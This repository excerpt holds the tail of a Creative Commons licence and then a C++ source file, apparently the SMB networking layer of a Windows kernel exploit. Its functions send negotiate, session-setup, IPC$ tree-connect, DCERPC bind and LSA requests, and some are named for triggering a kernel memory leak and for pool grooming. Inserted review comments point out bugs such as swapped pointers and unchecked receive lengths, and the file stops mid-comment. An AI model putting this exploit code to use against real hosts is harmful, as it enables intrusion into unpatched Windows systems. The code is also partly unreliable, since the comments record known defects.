284 | Section 5 -- Disclaimer of Warranties and Limitation of Liability.
285 |
286 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
287 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
288 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
289 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
290 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
291 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
292 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
293 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
294 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
295 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.
296 |
297 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
298 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
299 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
300 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
301 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
302 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
303 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
304 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
305 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.
306 |
307 | c. The disclaimer of warranties and limitation of liability provided
308 | above shall be interpreted in a manner that, to the extent
309 | possible, most closely approximates an absolute disclaimer and
310 | waiver of all liability.
311 |
312 |
313 | Section 6 -- Term and Termination.
314 |
315 | a. This Public License applies for the term of the Copyright and
316 | Similar Rights licensed here. However, if You fail to comply with
317 | this Public License, then Your rights under this Public License
318 | terminate automatically.
319 |
320 | b. Where Your right to use the Licensed Material has terminated under
321 | Section 6(a), it reinstates:
322 |
323 | 1. automatically as of the date the violation is cured, provided
324 | it is cured within 30 days of Your discovery of the
325 | violation; or
326 |
327 | 2. upon express reinstatement by the Licensor.
328 |
329 | For the avoidance of doubt, this Section 6(b) does not affect any
330 | right the Licensor may have to seek remedies for Your violations
331 | of this Public License.
332 |
333 | c. For the avoidance of doubt, the Licensor may also offer the
334 | Licensed Material under separate terms or conditions or stop
335 | distributing the Licensed Material at any time; however, doing so
336 | will not terminate this Public License.
337 |
338 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
339 | License.
340 |
341 |
342 | Section 7 -- Other Terms and Conditions.
343 |
344 | a. The Licensor shall not be bound by any additional or different
345 | terms or conditions communicated by You unless expressly agreed.
346 |
347 | b. Any arrangements, understandings, or agreements regarding the
348 | Licensed Material not stated herein are separate from and
349 | independent of the terms and conditions of this Public License.
350 |
351 |
352 | Section 8 -- Interpretation.
353 |
354 | a. For the avoidance of doubt, this Public License does not, and
355 | shall not be interpreted to, reduce, limit, restrict, or impose
356 | conditions on any use of the Licensed Material that could lawfully
357 | be made without permission under this Public License.
358 |
359 | b. To the extent possible, if any provision of this Public License is
360 | deemed unenforceable, it shall be automatically reformed to the
361 | minimum extent necessary to make it enforceable. If the provision
362 | cannot be reformed, it shall be severed from this Public License
363 | without affecting the enforceability of the remaining terms and
364 | conditions.
365 |
366 | c. No term or condition of this Public License will be waived and no
367 | failure to comply consented to unless expressly agreed to by the
368 | Licensor.
369 |
370 | d. Nothing in this Public License constitutes or may be interpreted
371 | as a limitation upon, or waiver of, any privileges and immunities
372 | that apply to the Licensor or You, including from the legal
373 | processes of any jurisdiction or authority.
374 |
375 |
376 | =======================================================================
377 |
378 | Creative Commons is not a party to its public
379 | licenses. Notwithstanding, Creative Commons may elect to apply one of
380 | its public licenses to material it publishes and in those instances
381 | will be considered the “Licensor.” The text of the Creative Commons
382 | public licenses is dedicated to the public domain under the CC0 Public
383 | Domain Dedication. Except for the limited purpose of indicating that
384 | material is shared under a Creative Commons public license or as
385 | otherwise permitted by the Creative Commons policies published at
386 | creativecommons.org/policies, Creative Commons does not authorize the
387 | use of the trademark "Creative Commons" or any other trademark or logo
388 | of Creative Commons without its prior written consent including,
389 | without limitation, in connection with any unauthorized modifications
390 | to any of its public licenses or any other arrangements,
391 | understandings, or agreements concerning use of licensed material. For
392 | the avoidance of doubt, this paragraph does not form part of the
393 | public licenses.
394 |
395 | Creative Commons may be contacted at creativecommons.org.
--------------------------------------------------------------------------------
/networkingfunctions.cpp:
--------------------------------------------------------------------------------
1 | #include "smb.h"
2 |
3 | #pragma warning(push)
4 | #pragma warning(disable : 6387)
5 | //#pragma warning(disable : )
6 |
7 | /*
8 | unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status)
9 | {
10 | typedef unsigned long(__stdcall* PFN_INET_ADDR)(const char* ip);
11 | s = NULL;
12 | sa = { 0 };
13 | wsa = { 0 };
14 | status = 0;
15 | HMODULE wsockdll = NULL;
16 | PFN_INET_ADDR pinet_addr = NULL;
17 |
18 | status = WSAStartup(MAKEWORD(2, 2), &wsa);
19 | if (status != 0)
20 | return MAKEUNSIGNED(WSAGetLastError());
21 |
22 | if (notnull(GetModuleHandleW(TEXT("ws2_32"))))
23 | {
24 | wsockdll = GetModuleHandleW(TEXT("ws2_32"));
25 | }
26 | else
27 | {
28 | wsockdll = LoadLibraryW(TEXT("ws2_32.dll"));
29 | }
30 |
31 | if (isnull(wsockdll))
32 | return STATUS_INVALID_HANDLE;
33 | else
34 | pinet_addr = (PFN_INET_ADDR)GetProcAddress(wsockdll, "inet_addr");
35 |
36 | if (isnull(pinet_addr))
37 | ExitProcess(STATUS_INVALID_HANDLE);
38 | else
39 | sa.sin_addr.s_addr = pinet_addr(targetip);
40 | sa.sin_family = AF_INET;
41 | sa.sin_port = htons(445);
42 |
43 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
44 |
45 | if (validsock(s))
46 | {
47 | status = connect(s, (sockaddr*)&sa, sizeof(sa));
48 | if (issockerr(status))
49 | {
50 | #ifdef _DEBUG
51 | fwprintf_s(stderr, TEXT("[%ws]:\t error 0x%08x occured when calling \"%ws\"\n"), __FUNCTIONW__, STATUS_FAIL, L"connect()");
52 | (VOID)SleepEx(2000, FALSE);
53 | ExitProcess(STATUS_FAIL);
54 | #else
55 | return MAKEUNSIGNED(STATUS_FAIL);
56 | #endif //_DEBUG
57 | }
58 | else
59 | {
60 | *(&status) &= 0;
61 | status = 0;
62 | return 0;
63 | }
64 |
65 | }
66 | else
67 | {
68 | return MAKEUNSIGNED(WSAGetLastError());
69 | }
70 |
71 | return STATUS_FAIL;
72 |
73 | }
74 |
75 | unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status)
76 | {
77 | status = 0;
78 |
79 | if (badsock(s))
80 | return MAKEUNSIGNED(WSAGetLastError());
81 |
82 | *(int*)(&status) = send(s, (const char*)bws->pbdata, *(int*)(&bws->dwsize), 0);
83 | return status;
84 | }
85 |
86 | unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status)
87 | {
88 | bwsalloc(bws, bufsize);
89 |
90 | if (badsock(s))
91 | return MAKEUNSIGNED(WSAGetLastError());
92 |
93 | *(int*)(&status) = recv(s, (char*)bws->pbdata, *(int*)(&bws->dwsize), 0);
94 | return status;
95 | }
96 | */
97 |
// Builds an SMB negotiate request into outbound->ThisPacket, sends it on s and
// reads the reply into inbound->ThisPacket (reply buffer re-sized to the number
// of bytes received).  Returns TRUE once a reply was received.  On any failure
// the socket is closed, WSACleanup() is called, both packet buffers are freed
// and FALSE is returned -- so a FALSE from here leaves s == INVALID_SOCKET.
//
// NOTE(review): recievestatus is a reference bound to sendstatus, so the two
// names alias one variable.  The while() below always returns or breaks on its
// first pass; it is effectively a single send/recv with a shared cleanup tail.
BOOLEAN SendRecvNegotiate(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info)
{
    unsigned int sendstatus = 0, & recievestatus = sendstatus;
    BUFFER* srv = (&outbound->ThisPacket), * client = (&inbound->ThisPacket), tmp = { 0 };

    // build the negotiate request; bail out if the packet builder returns NULL
    if (isnull(negotiate_request_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
    {
        errmsg(__FUNCSIG__, __LINE__, STATUS_NO_MEMORY);
        return FALSE;
    }

    // exit loop if socket is invalid
    while (validsock(s))
    {
        // send request
        PutUlong(&sendstatus, SendData(srv, s, sendstatus));

        outbound->ThisSmb = MAKEPSMB(srv->pbdata + 4);
        outbound->ThisNetbiosSize = srv->pbdata + sizeof(WORD);

        if (issockerr(sendstatus) || badsock(s) || ((sendstatus & STATUS_FAIL) == STATUS_FAIL))
        {
            sendstatus = STATUS_FAIL;
            break;
        }

        // recv response (up to 0x200 bytes)
        PutUlong(&recievestatus, RecvData(client, 0x200, s, recievestatus));

        // NOTE(review): the recv() result is used as an allocation size here,
        // *before* issockerr() is checked further down.  A SOCKET_ERROR return
        // would reach bwsalloc()/cpy() with that value as the length.  Checking
        // recievestatus first (as the sibling functions do) would be safer.
        bwsalloc(&tmp, recievestatus);
        cpy(tmp.pbdata, inbound->ThisPacket.pbdata, tmp.dwsize);
        bwsfree(&inbound->ThisPacket);
        bwsalloc(&inbound->ThisPacket, tmp.dwsize);
        cpy(inbound->ThisPacket.pbdata, tmp.pbdata, inbound->ThisPacket.dwsize);
        bwsfree(&tmp);

        // NOTE(review): these four lines point inbound at the *request* buffer
        // (srv) and outbound at the *reply* buffer (client).  Every sibling
        // function does the opposite (inbound <- client, outbound <- srv); this
        // looks swapped -- confirm before relying on inbound->ThisSmb here.
        inbound->ThisSmb = MAKEPSMB(srv->pbdata + 4);
        inbound->ThisNetbiosSize = srv->pbdata + 2;
        outbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
        outbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;

        if (issockerr(recievestatus))
        {
            sendstatus = STATUS_FAIL;
            break;
        }
        else
        {
            return TRUE;
        }
    }

    // the goto is redundant: control falls into cleanup either way
    if (sendstatus == STATUS_FAIL)
    {
        goto cleanup;
    }



cleanup:
    // tear down the whole Winsock session, not just this request
    if (validsock(s))
        closesocket(s);
    s = INVALID_SOCKET;
    WSACleanup();
    if (notnull(client->pbdata))
        bwsfree(client);
    if (notnull(srv->pbdata))
        bwsfree(srv);
    return FALSE;
}
169 |
// Builds a session-setup request into outbound->ThisPacket, sends it and reads
// the reply into inbound->ThisPacket, then refreshes the ThisSmb /
// ThisNetbiosSize pointers of both lists.  Returns TRUE on success.
//
// sendstatus[0] receives the send()/recv() byte counts (recievestatus is a
// reference to it, so the recv result overwrites the send result);
// sendstatus[1] is handed to SendData/RecvData as their status out-parameter.
//
// NOTE(review): srv and client are formed from outbound/inbound *before* the
// null check below; `&outbound->ThisPacket` on a null pointer is undefined
// behaviour even though nothing is dereferenced -- hoist the check above.
// NOTE(review): the send/recv failure returns do not free srv, unlike
// SendRecvTransDcerpcBind; the request buffer leaks on those paths.
BOOLEAN SendRecvSessionSetupAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info)
{
    unsigned int sendstatus[2] = { 0 }, & recievestatus = *sendstatus;
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
    BOOLEAN retval = 0; // unused

    if (isnull(outbound) || isnull(inbound) || isnull(info))
    {
        SetLastError(STATUS_INVALID_PARAMETER);
        //errmsg(__FUNCTION__, __LINE__, GetLastError());
        return FALSE;
    }

    if (badsock(s))
        return FALSE;

    if (isnull(session_setup_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
    {
        errmsg(__FUNCSIG__, __LINE__, STATUS_NO_MEMORY);
        return FALSE;
    }

    PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));

    // zero bytes sent or a socket error: give up
    if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
        return FALSE;

    // read up to 0x200 bytes of reply
    PutUnsigned(&recievestatus, RecvData(client, 0x200, s, GetUnsigned(sendstatus + 1)));

    if (!GetUlong(&recievestatus) || issockerr(GetUlong(&recievestatus)))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(&recievestatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    // NOTE(review): the received length is never compared against
    // SMB_HEADER_OFFSET + header size, so these pointers may reach past the
    // reply if a peer sends a short frame; nothing is dereferenced here, but
    // callers of inbound->ThisSmb should check dwsize first.
    inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
    inbound->ThisNetbiosSize = MAKEPBYTE(client->pbdata + NETBIOS_SIZE_OFFSET);
    outbound->ThisNetbiosSize = MAKEPBYTE(srv->pbdata + NETBIOS_SIZE_OFFSET);

    return TRUE;
}
217 |
// Formats "\\<ip>\IPC$" from the caller-supplied ip, builds a tree-connect
// request into outbound->ThisPacket, sends it, reads the reply (up to 0x300
// bytes) into inbound->ThisPacket and refreshes the ThisSmb/ThisNetbiosSize
// pointers.  Returns FALSE if either buffer lacks the "\xFFSMB" signature or
// if the reply's NtStatus has any STATUS_FAIL bit set.
//
// NOTE(review): sendsize/recvsize/unc/unicodeiptmp/i are `static`, so they are
// shared across calls -- this function is not reentrant.
// NOTE(review): unlike its siblings this function never checks outbound,
// inbound, info or s before use, and never checks the send/recv results: a
// SOCKET_ERROR from recv would reach bwsalloc(&tmp, ...) as the size.
// NOTE(review): wstring, i and iparray are unused.
BOOLEAN SendRecvTreeConnectAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, PCWSTR IN ip)
{
    static unsigned int sendsize[2], recvsize[2];
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
    static UNICODE_STRING wstring, unc; static PWSTR unicodeiptmp;
    WCHAR psztmp[0x100] = { 0 };
    static DWORD i;
    BYTE iparray[4] = { 0 };

    // static pointer aimed at a stack buffer: it dangles once this returns
    unicodeiptmp = MAKEPWSTR(psztmp);

    // NOTE(review): wsprintfW takes no destination size and psztmp holds only
    // 0x100 WCHARs; an over-long ip overruns the stack buffer.  Prefer
    // StringCchPrintfW(psztmp, _countof(psztmp), ...) or check wcslen(ip) first.
    wsprintfW(unicodeiptmp, L"\\\\%ws\\IPC$", ip);
    InitUnicodeString(unicodeiptmp, &unc);


    if (isnull(tree_connect_packet(srv, &unc, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
    {
        FreeUnicodeString(&unc);
        return FALSE;
    }
    // NOTE(review): unc is only freed on the failure path above; whether
    // tree_connect_packet takes ownership of it is not visible here -- confirm.



    PutUlong(sendsize, SendData(srv, s, sendsize[1]));

    PutUlong(recvsize, RecvData(client, 0x300, s, recvsize[1]));

    // signature check on both the request we built and the reply we received
    if (!cmp(srv->pbdata + 4, "\xFFSMB", 4))
        return FALSE;
    if (!cmp(client->pbdata + 4, "\xFFSMB", 4))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(recvsize));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);
    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisNetbiosSize = MAKEPBYTE(inbound->ThisPacket.pbdata + sizeof(WORD));
    outbound->ThisNetbiosSize = MAKEPBYTE(outbound->ThisPacket.pbdata + sizeof(WORD));
    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + 4);
    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + 4);

    // STATUS_FAIL is a project mask whose value is not visible here; this
    // treats any overlapping bit in the reply's NtStatus as failure
    if (inbound->ThisSmb->Status.NtStatus & STATUS_FAIL)
        return FALSE;
    else
        return TRUE;
}
267 |
// Builds an NT_CREATE_ANDX request into outbound->ThisPacket, sends it, reads
// the reply (up to 0x200 bytes) into inbound->ThisPacket and, when the reply's
// NtStatus is 0, stores the returned Fid into info via set_fid() (otherwise
// stores 0).  Returns TRUE when the reply carries the SMB signature and no
// STATUS_FAIL bit; on a failing NtStatus the value is also passed to
// SetLastError().
//
// NOTE(review): the Fid is read from the reply at offset 36 *before* the
// "\xFFSMB" signature check near the end and without checking that
// recvstatus covers 36 + sizeof(RESP_NT_CREATE_ANDX).  Those bytes come from
// the remote peer; moving the signature and length checks ahead of set_fid()
// would avoid storing a Fid taken from an unvalidated or short frame.
// NOTE(review): the send/recv failure returns do not free srv, unlike
// SendRecvTransDcerpcBind.
BOOLEAN SendRecvNtCreateAndx(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info)
{
    // compile-time only: silences warning 28182 for this body
#pragma warning(push)
#pragma warning(disable : 28182)
    BUFFER* client = &inbound->ThisPacket, * srv = &outbound->ThisPacket, tmp = { 0 };
    unsigned int sendstatus = 0, recvstatus = 0;

    // outbound/inbound themselves are not null-checked here
    if (badsock(s) || isnull(info))
        return FALSE;

    if (isnull(nt_create_andx_packet(srv, byteswap16(0), get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
        return FALSE;

    PutUlong(&sendstatus, SendData(srv, s, sendstatus));

    if (sendstatus == 0 || issockerr(sendstatus))
        return FALSE;

    PutUlong(&recvstatus, RecvData(client, 0x200, s, recvstatus));

    if (recvstatus == 0 || issockerr(recvstatus))
        return FALSE;

    if (notnull(inbound->ThisPacket.pbdata))
    {
        inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + 4);
        if (inbound->ThisSmb->Status.NtStatus == 0)
        {
            // 36 = 4-byte NetBIOS prefix + 32-byte SMB header (project layout)
            PRESP_NT_CREATE_ANDX presp = (PRESP_NT_CREATE_ANDX)(inbound->ThisPacket.pbdata + 36);
            set_fid(info, presp->Fid);
        }
        else
        {
            set_fid(info, 0);
        }
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(&recvstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);


    // re-point the header views at the reallocated buffers
    inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
    outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

    if (!cmp(client->pbdata + 4, "\xFFSMB", 4))
        return FALSE;

    if (inbound->ThisSmb->Status.NtStatus & STATUS_FAIL)
    {
        SetLastError(GetUlong(&inbound->ThisSmb->Status.NtStatus));
        return FALSE;
    }
#pragma warning(pop)
    return TRUE;
}
330 |
// Builds the DCERPC bind transaction into outbound->ThisPacket, sends it,
// reads the reply (up to 0x400 bytes) into inbound->ThisPacket, verifies the
// "\xFFSMB" signature and refreshes the ThisSmb/ThisNetbiosSize pointers.
// Returns TRUE on success.  Buffers are freed on the later failure paths;
// the socket-error path right after SendData returns without freeing srv.
//
// NOTE(review): sendsize/recvsize are `static`, so this is not reentrant.
// NOTE(review): the recv result is only tested for == 0, not with
// issockerr(); a SOCKET_ERROR return is non-zero and would pass through to
// cmp() on unreceived bytes and to bwsalloc(&tmp, ...) with that value as
// the size.  Same pattern in SendRecvLsaGetUsername.
BOOLEAN SendRecvTransDcerpcBind(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    static unsigned int sendsize[2], recvsize[2];
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    // outbound/inbound/info are not null-checked here
    if (badsock(s))
        return FALSE;

    if (isnull(trans_dcerpc_bind_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
        return FALSE;

    PutUlong(sendsize, SendData(srv, s, sendsize[1]));

    if (badsock(s) || issockerr(GetUlong(sendsize)))
        return FALSE;

    // nothing sent: release the request buffer
    if (!sendsize[0])
    {
        bwsfree(srv);
        return FALSE;
    }

    PutUlong(recvsize, RecvData(client, 0x400, s, recvsize[1]));

    if ((*recvsize) == 0)
    {
        bwsfree(srv);
        bwsfree(client);
        return FALSE;
    }

    if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
    {
        bwsfree(srv);
        bwsfree(client);
        return FALSE;
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(recvsize));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);
    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
    outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

    return TRUE;
}
383 |
// Builds the WRITE_ANDX carrying the lsarpc GetUserName call into
// outbound->ThisPacket, sends it, reads the reply (up to 0x400 bytes) into
// inbound->ThisPacket, verifies the "\xFFSMB" signature and refreshes the
// ThisSmb/ThisNetbiosSize pointers.  Returns TRUE on success.
// Same shape and same caveats as SendRecvTransDcerpcBind: static status
// arrays (not reentrant), srv not freed on the socket-error path after
// SendData, and the recv result is only tested for == 0 rather than with
// issockerr(), so a SOCKET_ERROR value can reach cmp() and bwsalloc().
BOOLEAN SendRecvLsaGetUsername(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    static unsigned int sendsize[2], recvsize[2];
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    // outbound/inbound/info are not null-checked here
    if (badsock(s))
        return FALSE;

    if (isnull(write_andx_lsarpc_getusername_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
        return FALSE;

    PutUlong(sendsize, SendData(srv, s, sendsize[1]));

    if (badsock(s) || issockerr(GetUlong(sendsize)))
        return FALSE;

    // nothing sent: release the request buffer
    if (!sendsize[0])
    {
        bwsfree(srv);
        return FALSE;
    }

    PutUlong(recvsize, RecvData(client, 0x400, s, recvsize[1]));

    if ((*recvsize) == 0)
    {
        bwsfree(srv);
        bwsfree(client);
        return FALSE;
    }

    if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
    {
        bwsfree(srv);
        bwsfree(client);
        return FALSE;
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(recvsize));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;

    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;




    return TRUE;
}
441 |
// Builds the packet produced by trans_trigger_first_leak_packet (with a
// hard-coded pid of 10252) into outbound->ThisPacket, sends it, reads the
// reply (up to 0x100 bytes) into inbound->ThisPacket and checks the "\xFFSMB"
// signature.  Returns TRUE on success.  `leak` is null-checked but otherwise
// untouched here (leakdata is assigned and never used).
//
// NOTE(review): srv/client/leakdata are formed from the pointer arguments
// before the null check; `&leak->KrnlLeakResponse` on a null leak is
// undefined behaviour -- hoist the check.
// NOTE(review): the send result in *sstatus is never checked; only the recv
// result is.  The signature-mismatch return also skips the bwsfree() calls
// that the recv-error path performs, so cleanup is inconsistent.
// NOTE(review): inbound->ThisPacket is freed and reallocated below but
// inbound->ThisSmb / ThisNetbiosSize are not refreshed; if a previous call
// set them they now point into freed memory.
BOOLEAN SendRecvTransFirstLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info)
{
    // static: shared across calls, not reentrant
    static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;

    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 }, * leakdata = &leak->KrnlLeakResponse;

    if (badsock(s))
        return FALSE;

    if (isnull(outbound) || isnull(inbound) || isnull(leak) || isnull(info))
    {
        errmsg(__FUNCSIG__, __LINE__, STATUS_INVALID_PARAMETER);
        SetLastError(STATUS_INVALID_PARAMETER | STATUS_FAIL);
        return FALSE;
    }

    if (isnull(trans_trigger_first_leak_packet(srv, 10252, get_uid(info), get_mid(info), get_tid(info))))
    {
        SetLastError(STATUS_NO_MEMORY | STATUS_FAIL);
        return FALSE;
    }

    sstatus = sendsize;
    rstatus = recvsize;

    PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));

    PutUnsigned(rstatus, RecvData(client, 0x100, s, GetUnsigned(recvsize + 1)));

    if (isnull(*rstatus) || issockerr(*rstatus))
    {
        // surface the Winsock error through SetLastError()
        PutUlong(sstatus, WSAGetLastError());
        bwsfree(srv);
        bwsfree(client);
        SetLastError(GetUlong(sstatus));
        return FALSE;
    }

    if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(rstatus));
    cpy(tmp.pbdata, inbound->ThisPacket.pbdata, tmp.dwsize);
    bwsfree(&inbound->ThisPacket);
    bwsalloc(&inbound->ThisPacket, tmp.dwsize);
    cpy(inbound->ThisPacket.pbdata, tmp.pbdata, inbound->ThisPacket.dwsize);
    bwsfree(&tmp);

    return TRUE;
}
492 |
// Builds the packet produced by trans_groom_type_one_packet into
// outbound->ThisPacket, sends it and reads the reply (up to 0x100 bytes) into
// inbound->ThisPacket.  Returns TRUE when a non-zero, non-error byte count was
// received.  Unlike most siblings there is no "\xFFSMB" signature check and
// the ThisSmb / ThisNetbiosSize pointers are not refreshed after the reply
// buffer is reallocated (a previously set inbound->ThisSmb would dangle).
//
// NOTE(review): srv/client are formed before the null check on
// outbound/inbound; hoist the check.  The send result in *sstatus is never
// examined.
BOOLEAN SendRecvTransGroomTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    // static: shared across calls, not reentrant
    static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    if (badsock(s))
        return FALSE;
    if (isnull(outbound) || isnull(inbound) || isnull(info))
        return FALSE;

    sstatus = sendsize;
    rstatus = recvsize;

    if (isnull(trans_groom_type_one_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
        return FALSE;

    *sstatus = SendData(srv, s, GetUnsigned(sendsize + 1));

    *rstatus = RecvData(client, 0x100, s, GetUnsigned(recvsize + 1));

    if (isnull(*rstatus) || issockerr(*rstatus))
    {
        // surface the Winsock error through SetLastError(), then release both buffers
        *sstatus = WSAGetLastError();
        SetLastError(GetUlong(sstatus));
        bwsfree(client);
        bwsfree(srv);
        return FALSE;
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(rstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);
    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    return TRUE;
}
531 |
// Builds the packet produced by trans_multirequest_type_one_packet (passing
// the local `mids` array instead of get_mid(info)) into outbound->ThisPacket,
// sends it, reads the reply (up to 0x400 bytes) into inbound->ThisPacket,
// refreshes the ThisSmb/ThisNetbiosSize pointers and checks the reply's
// Protocol field for "\xFFSMB".  Returns TRUE on success.
//
// NOTE(review): the send-failure path frees srv but the recv-failure path
// does not, so the request buffer leaks on a recv error.
// NOTE(review): srv/client are formed before the null check on
// outbound/inbound; hoist the check.
